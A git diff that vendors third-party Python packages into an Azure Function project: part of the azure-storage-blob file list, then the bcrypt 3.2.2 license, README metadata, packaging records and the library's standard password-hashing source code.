+azure/storage/blob/aio/__pycache__/_download_async.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_lease_async.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_list_blobs_helper.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_models.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_upload_helpers.cpython-39.pyc,, +azure/storage/blob/aio/_blob_client_async.py,sha256=9qVba5natEDexGJndjUY6ydsQQEynNVuV0j2XbtKSLg,149107 +azure/storage/blob/aio/_blob_service_client_async.py,sha256=BCj5lUSEj7UMsHLYsY6JAHfX5ZNtg9CoolViylf9YNc,32623 +azure/storage/blob/aio/_container_client_async.py,sha256=J2qpatfghXvbufZ6ZcNYOMKQjG2t1osNwIcAyaZSgTs,64530 +azure/storage/blob/aio/_download_async.py,sha256=E-7MQ3xUCKbeKVS7GqxR6L70kLI_TqRT6z20QyzMuZs,22338 +azure/storage/blob/aio/_lease_async.py,sha256=0CzUaO7_8mCzzi2XrUXx_km3k1DHZq35ebu8mXecPC0,16327 +azure/storage/blob/aio/_list_blobs_helper.py,sha256=iXwnipb_QpTAD4lOEqQJrP8OpKTT8nEpSfEigk2o7PI,7905 +azure/storage/blob/aio/_models.py,sha256=e2sEBDN3163BIFtB64AByB0lMaUzrvLIFdn7k3xpTQA,7685 +azure/storage/blob/aio/_upload_helpers.py,sha256=ArTzbMpLXvuRu4o7YCvBPu5PTJIlOl7AKg5ZIcqQVlg,11914 +azure/storage/blob/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +azure_storage_blob-12.12.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +azure_storage_blob-12.12.0.dist-info/LICENSE,sha256=_VMkgdgo4ToLE8y1mOAjOKNhd0BnWoYu5r3BVBto6T0,1073 +azure_storage_blob-12.12.0.dist-info/METADATA,sha256=Yr2_YRkUM7lTHOBPZmKfi1fvbqbTBIok7k1918G9v3M,25418 +azure_storage_blob-12.12.0.dist-info/RECORD,, +azure_storage_blob-12.12.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +azure_storage_blob-12.12.0.dist-info/WHEEL,sha256=ewwEueio1C2XeHTvT17n8dZUJgOvyCWCt0WVNLClP9o,92 +azure_storage_blob-12.12.0.dist-info/top_level.txt,sha256=S7DhWV9m80TBzAhOFjxDUiNbKszzoThbnrSz5MpbHSQ,6 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/REQUESTED 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/REQUESTED new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/WHEEL new file mode 100644 index 0000000..725a409 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/top_level.txt new file mode 100644 index 0000000..f6434ca --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/top_level.txt @@ -0,0 +1 @@ +azure diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/LICENSE new file mode 100644 index 0000000..583bd5a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/LICENSE @@ -0,0 +1,201 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + +TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + +1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. 
+ + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + +2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + +3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + +4. Redistribution. 
You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + +5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + +6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + +7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + +8. Limitation of Liability. 
In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + +9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + +END OF TERMS AND CONDITIONS + +APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + +Copyright [yyyy] [name of copyright owner] + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. 
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/METADATA new file mode 100644 index 0000000..e269af9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/METADATA @@ -0,0 +1,271 @@
+Metadata-Version: 2.1
+Name: bcrypt
+Version: 3.2.2
+Summary: Modern password hashing for your software and your servers
+Home-page: https://github.com/pyca/bcrypt/
+Author: The Python Cryptographic Authority developers
+Author-email: cryptography-dev@python.org
+License: Apache License, Version 2.0
+Platform: UNKNOWN
+Classifier: Development Status :: 5 - Production/Stable
+Classifier: License :: OSI Approved :: Apache Software License
+Classifier: Programming Language :: Python :: Implementation :: CPython
+Classifier: Programming Language :: Python :: Implementation :: PyPy
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3 :: Only
+Classifier: Programming Language :: Python :: 3.6
+Classifier: Programming Language :: Python :: 3.7
+Classifier: Programming Language :: Python :: 3.8
+Classifier: Programming Language :: Python :: 3.9
+Classifier: Programming Language :: Python :: 3.10
+Requires-Python: >=3.6
+Description-Content-Type: text/x-rst
+Requires-Dist: cffi (>=1.1)
+Provides-Extra: tests
+Requires-Dist: pytest (!=3.3.0,>=3.2.1) ; extra == 'tests'
+Provides-Extra: typecheck
+Requires-Dist: mypy ; extra == 'typecheck'
+
+bcrypt
+======
+
+.. image:: https://img.shields.io/pypi/v/bcrypt.svg
+    :target: https://pypi.org/project/bcrypt/
+    :alt: Latest Version
+
+.. image:: https://github.com/pyca/bcrypt/workflows/CI/badge.svg?branch=main
+    :target: https://github.com/pyca/bcrypt/actions?query=workflow%3ACI+branch%3Amain
+
+Good password hashing for your software and your servers
+
+
+Installation
+============
+
+To install bcrypt, simply:
+
+.. code:: bash
+
+    $ pip install bcrypt
+
+Note that bcrypt should build very easily on Linux provided you have a C compiler, headers for Python (if you're not using pypy), and headers for the libffi libraries available on your system.
+
+For Debian and Ubuntu, the following command will ensure that the required dependencies are installed:
+
+.. code:: bash
+
+    $ sudo apt-get install build-essential libffi-dev python-dev
+
+For Fedora and RHEL-derivatives, the following command will ensure that the required dependencies are installed:
+
+.. code:: bash
+
+    $ sudo yum install gcc libffi-devel python-devel
+
+For Alpine, the following command will ensure that the required dependencies are installed:
+
+.. code:: bash
+
+    $ apk add --update musl-dev gcc libffi-dev
+
+
+Alternatives
+============
+
+While bcrypt remains a good choice for password storage, depending on your specific use case you may also want to consider using scrypt (either via `standard library`_ or `cryptography`_) or argon2id via `argon2_cffi`_.
+
+Changelog
+=========
+
+3.2.2
+-----
+
+* Fixed packaging of ``py.typed`` files in wheels so that ``mypy`` works.
+
+3.2.1
+-----
+
+* Added support for compilation on z/OS
+* The next release of ``bcrypt`` will be 4.0 and it will require Rust at
+  compile time, for users building from source. There will be no additional
+  requirement for users who are installing from wheels.
Users on most + platforms will be able to obtain a wheel by making sure they have an up to + date ``pip``. The minimum supported Rust version will be 1.56.0. +* This will be the final release for which we ship ``manylinux2010`` wheels. + Going forward the minimum supported manylinux ABI for our wheels will be + ``manylinux2014``. The vast majority of users will continue to receive + ``manylinux`` wheels provided they have an up to date ``pip``. + + +3.2.0 +----- + +* Added typehints for library functions. +* Dropped support for Python versions less than 3.6 (2.7, 3.4, 3.5). +* Shipped ``abi3`` Windows wheels (requires pip >= 20). + +3.1.7 +----- + +* Set a ``setuptools`` lower bound for PEP517 wheel building. +* We no longer distribute 32-bit ``manylinux1`` wheels. Continuing to produce + them was a maintenance burden. + +3.1.6 +----- + +* Added support for compilation on Haiku. + +3.1.5 +----- + +* Added support for compilation on AIX. +* Dropped Python 2.6 and 3.3 support. +* Switched to using ``abi3`` wheels for Python 3. If you are not getting a + wheel on a compatible platform please upgrade your ``pip`` version. + +3.1.4 +----- + +* Fixed compilation with mingw and on illumos. + +3.1.3 +----- +* Fixed a compilation issue on Solaris. +* Added a warning when using too few rounds with ``kdf``. + +3.1.2 +----- +* Fixed a compile issue affecting big endian platforms. +* Fixed invalid escape sequence warnings on Python 3.6. +* Fixed building in non-UTF8 environments on Python 2. + +3.1.1 +----- +* Resolved a ``UserWarning`` when used with ``cffi`` 1.8.3. + +3.1.0 +----- +* Added support for ``checkpw``, a convenience method for verifying a password. +* Ensure that you get a ``$2y$`` hash when you input a ``$2y$`` salt. +* Fixed a regression where ``$2a`` hashes were vulnerable to a wraparound bug. +* Fixed compilation under Alpine Linux. + +3.0.0 +----- +* Switched the C backend to code obtained from the OpenBSD project rather than + openwall. +* Added support for ``bcrypt_pbkdf`` via the ``kdf`` function. + +2.0.0 +----- +* Added support for an adjustable prefix when calling ``gensalt``. +* Switched to CFFI 1.0+ + +Usage +----- + +Password Hashing +~~~~~~~~~~~~~~~~ + +Hashing and then later checking that a password matches the previous hashed +password is very simple: + +.. code:: pycon + + >>> import bcrypt + >>> password = b"super secret password" + >>> # Hash a password for the first time, with a randomly-generated salt + >>> hashed = bcrypt.hashpw(password, bcrypt.gensalt()) + >>> # Check that an unhashed password matches one that has previously been + >>> # hashed + >>> if bcrypt.checkpw(password, hashed): + ... print("It Matches!") + ... else: + ... print("It Does not Match :(") + +KDF +~~~ + +As of 3.0.0 ``bcrypt`` now offers a ``kdf`` function which does ``bcrypt_pbkdf``. +This KDF is used in OpenSSH's newer encrypted private key format. + +.. code:: pycon + + >>> import bcrypt + >>> key = bcrypt.kdf( + ... password=b'password', + ... salt=b'salt', + ... desired_key_bytes=32, + ... rounds=100) + + +Adjustable Work Factor +~~~~~~~~~~~~~~~~~~~~~~ +One of bcrypt's features is an adjustable logarithmic work factor. To adjust +the work factor, merely pass the desired number of rounds to +``bcrypt.gensalt(rounds=12)``, which defaults to 12: + +..
code:: pycon + + >>> import bcrypt + >>> password = b"super secret password" + >>> # Hash a password for the first time, with a certain number of rounds + >>> hashed = bcrypt.hashpw(password, bcrypt.gensalt(14)) + >>> # Check that an unhashed password matches one that has previously been + >>> # hashed + >>> if bcrypt.checkpw(password, hashed): + ... print("It Matches!") + ... else: + ... print("It Does not Match :(") + + +Adjustable Prefix +~~~~~~~~~~~~~~~~~ + +Another one of bcrypt's features is an adjustable prefix to let you define what +libraries you'll remain compatible with. To adjust this, pass either ``2a`` or +``2b`` (the default) to ``bcrypt.gensalt(prefix=b"2b")`` as a bytes object. + +As of 3.0.0 the ``$2y$`` prefix is still supported in ``hashpw`` but deprecated. + +Maximum Password Length +~~~~~~~~~~~~~~~~~~~~~~~ + +The bcrypt algorithm only handles passwords up to 72 characters; any characters +beyond that are ignored. To work around this, a common approach is to hash a +password with a cryptographic hash (such as ``sha256``) and then base64 +encode it to prevent NULL byte problems before hashing the result with +``bcrypt``: + +.. code:: pycon + + >>> import base64 + >>> import bcrypt + >>> import hashlib + >>> password = b"an incredibly long password" * 10 + >>> hashed = bcrypt.hashpw( + ... base64.b64encode(hashlib.sha256(password).digest()), + ... bcrypt.gensalt() + ... ) + +Compatibility +------------- + +This library should be compatible with py-bcrypt and will run on Python +3.6+ and PyPy 3. + +C Code +------ + +This library uses code from OpenBSD. + +Security +-------- + +``bcrypt`` follows the `same security policy as cryptography`_; if you +identify a vulnerability, we ask you to contact us privately. + +.. _`same security policy as cryptography`: https://cryptography.io/en/latest/security.html +.. _`standard library`: https://docs.python.org/3/library/hashlib.html#hashlib.scrypt +.. _`argon2_cffi`: https://argon2-cffi.readthedocs.io +..
_`cryptography`: https://cryptography.io/en/latest/hazmat/primitives/key-derivation-functions/#cryptography.hazmat.primitives.kdf.scrypt.Scrypt + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/RECORD new file mode 100644 index 0000000..e97d0e8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/RECORD @@ -0,0 +1,14 @@ +bcrypt-3.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +bcrypt-3.2.2.dist-info/LICENSE,sha256=gXPVwptPlW1TJ4HSuG5OMPg-a3h43OGMkZRR1rpwfJA,10850 +bcrypt-3.2.2.dist-info/METADATA,sha256=8N_0mlqmjxBLT_9IIrIJ52PjeZfif62oFT6gtLc7BWc,8320 +bcrypt-3.2.2.dist-info/RECORD,, +bcrypt-3.2.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +bcrypt-3.2.2.dist-info/WHEEL,sha256=TIQeZFe3DwXBO5UGlCH1aKpf5Cx6FJLbIUqd-Sq2juI,185 +bcrypt-3.2.2.dist-info/top_level.txt,sha256=igJttN6fNWPEzk4lnCMzlitVT_1PlLVJzxzogMWGARU,15 +bcrypt/__about__.py,sha256=y3-LY1hqQ1KAVagHmhL_-VDEDf4r3LWt4HnGi6OCGmk,1320 +bcrypt/__init__.py,sha256=tr7xBv0w9ajqIHf8537qirLqM_bGOGM_lIQMjFd1PfI,5587 +bcrypt/__pycache__/__about__.cpython-39.pyc,, +bcrypt/__pycache__/__init__.cpython-39.pyc,, +bcrypt/_bcrypt.abi3.so,sha256=trqhBrLOWPP9HC_fwbcyEajpTBZLi0A6eSVjGkNAvu8,126504 +bcrypt/_bcrypt.pyi,sha256=TGNrzZD1NWdyeWGGJ2i3tj_HWg_YovqF-WdI7otmiIg,47 +bcrypt/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/REQUESTED b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/REQUESTED new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/WHEEL new file mode 100644 index 0000000..de7d6e2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/WHEEL @@ -0,0 +1,7 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: false +Tag: cp36-abi3-manylinux_2_17_x86_64 +Tag: cp36-abi3-manylinux2014_x86_64 +Tag: cp36-abi3-manylinux_2_24_x86_64 + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/top_level.txt new file mode 100644 index 0000000..87e2d76 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/top_level.txt @@ -0,0 +1,2 @@ +_bcrypt +bcrypt diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__about__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__about__.py new file mode 100644 index 0000000..21a5c56 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__about__.py @@ -0,0 +1,41 @@ +# Author:: Donald Stufft () +# Copyright:: Copyright (c) 2013 Donald Stufft +# License:: Apache License, Version 2.0 +# +# Licensed under the Apache License, 
Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from __future__ import absolute_import +from __future__ import division +from __future__ import unicode_literals + +__all__ = [ + "__title__", + "__summary__", + "__uri__", + "__version__", + "__author__", + "__email__", + "__license__", + "__copyright__", +] + +__title__ = "bcrypt" +__summary__ = "Modern password hashing for your software and your servers" +__uri__ = "https://github.com/pyca/bcrypt/" + +__version__ = "3.2.2" + +__author__ = "The Python Cryptographic Authority developers" +__email__ = "cryptography-dev@python.org" + +__license__ = "Apache License, Version 2.0" +__copyright__ = "Copyright 2013-2022 {0}".format(__author__) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__init__.py new file mode 100644 index 0000000..427ed37 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__init__.py @@ -0,0 +1,171 @@ +# Author:: Donald Stufft () +# Copyright:: Copyright (c) 2013 Donald Stufft +# License:: Apache License, Version 2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from __future__ import absolute_import +from __future__ import division + +import hmac +import os +import re +import warnings + +from .__about__ import ( + __author__, + __copyright__, + __email__, + __license__, + __summary__, + __title__, + __uri__, + __version__, +) +from . 
import _bcrypt # noqa: I100 + + +__all__ = [ + "__title__", + "__summary__", + "__uri__", + "__version__", + "__author__", + "__email__", + "__license__", + "__copyright__", + "gensalt", + "hashpw", + "kdf", + "checkpw", +] + + +_normalize_re = re.compile(rb"^\$2y\$") + + +def gensalt(rounds: int = 12, prefix: bytes = b"2b") -> bytes: + if prefix not in (b"2a", b"2b"): + raise ValueError("Supported prefixes are b'2a' or b'2b'") + + if rounds < 4 or rounds > 31: + raise ValueError("Invalid rounds") + + salt = os.urandom(16) + output = _bcrypt.ffi.new("char[]", 30) + _bcrypt.lib.encode_base64(output, salt, len(salt)) + + return ( + b"$" + + prefix + + b"$" + + ("%2.2u" % rounds).encode("ascii") + + b"$" + + _bcrypt.ffi.string(output) + ) + + +def hashpw(password: bytes, salt: bytes) -> bytes: + if isinstance(password, str) or isinstance(salt, str): + raise TypeError("Strings must be encoded before hashing") + + if b"\x00" in password: + raise ValueError("password may not contain NUL bytes") + + # bcrypt originally suffered from a wraparound bug: + # http://www.openwall.com/lists/oss-security/2012/01/02/4 + # This bug was corrected in the OpenBSD source by truncating inputs to 72 + # bytes on the updated prefix $2b$, but leaving $2a$ unchanged for + # compatibility. However, pyca/bcrypt 2.0.0 *did* correctly truncate inputs + # on $2a$, so we do it here to preserve compatibility with 2.0.0 + password = password[:72] + + # When the original 8bit bug was found, the original library we supported + # added a new prefix, $2y$, that fixes it. This prefix is exactly the same + # as the $2b$ prefix added by OpenBSD other than the name. Since the + # OpenBSD library does not support the $2y$ prefix, if the salt given to us + # is for the $2y$ prefix, we'll just munge it so that it's a $2b$ prior to + # passing it into the C library. + original_salt, salt = salt, _normalize_re.sub(b"$2b$", salt) + + hashed = _bcrypt.ffi.new("char[]", 128) + retval = _bcrypt.lib.bcrypt_hashpass(password, salt, hashed, len(hashed)) + + if retval != 0: + raise ValueError("Invalid salt") + + # Now that we've gotten our hashed password, we want to ensure that the + # prefix we return is the one that was passed in, so we'll use the prefix + # from the original salt and concatenate that with the return value (minus + # the return value's prefix). This will ensure that if someone passed in a + # salt with a $2y$ prefix, that they get back a hash with a $2y$ prefix + # even though we munged it to $2b$.
+ return original_salt[:4] + _bcrypt.ffi.string(hashed)[4:] + + +def checkpw(password: bytes, hashed_password: bytes) -> bool: + if isinstance(password, str) or isinstance(hashed_password, str): + raise TypeError("Strings must be encoded before checking") + + if b"\x00" in password or b"\x00" in hashed_password: + raise ValueError( + "password and hashed_password may not contain NUL bytes" + ) + + ret = hashpw(password, hashed_password) + return hmac.compare_digest(ret, hashed_password) + + +def kdf( + password: bytes, + salt: bytes, + desired_key_bytes: int, + rounds: int, + ignore_few_rounds: bool = False, +) -> bytes: + if isinstance(password, str) or isinstance(salt, str): + raise TypeError("Strings must be encoded before hashing") + + if len(password) == 0 or len(salt) == 0: + raise ValueError("password and salt must not be empty") + + if desired_key_bytes <= 0 or desired_key_bytes > 512: + raise ValueError("desired_key_bytes must be 1-512") + + if rounds < 1: + raise ValueError("rounds must be 1 or more") + + if rounds < 50 and not ignore_few_rounds: + # They probably think bcrypt.kdf()'s rounds parameter is logarithmic, + # expecting this value to be slow enough (it probably would be if this + # were bcrypt). Emit a warning. + warnings.warn( + ( + "Warning: bcrypt.kdf() called with only {0} round(s). " + "This few is not secure: the parameter is linear, like PBKDF2." + ).format(rounds), + UserWarning, + stacklevel=2, + ) + + key = _bcrypt.ffi.new("uint8_t[]", desired_key_bytes) + res = _bcrypt.lib.bcrypt_pbkdf( + password, len(password), salt, len(salt), key, len(key), rounds + ) + _bcrypt_assert(res == 0) + + return _bcrypt.ffi.buffer(key, desired_key_bytes)[:] + + +def _bcrypt_assert(ok: bool) -> None: + if not ok: + raise SystemError("bcrypt assertion failed") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__pycache__/__about__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__pycache__/__about__.cpython-39.pyc new file mode 100644 index 0000000..f34f493 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__pycache__/__about__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..80be598 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/_bcrypt.abi3.so 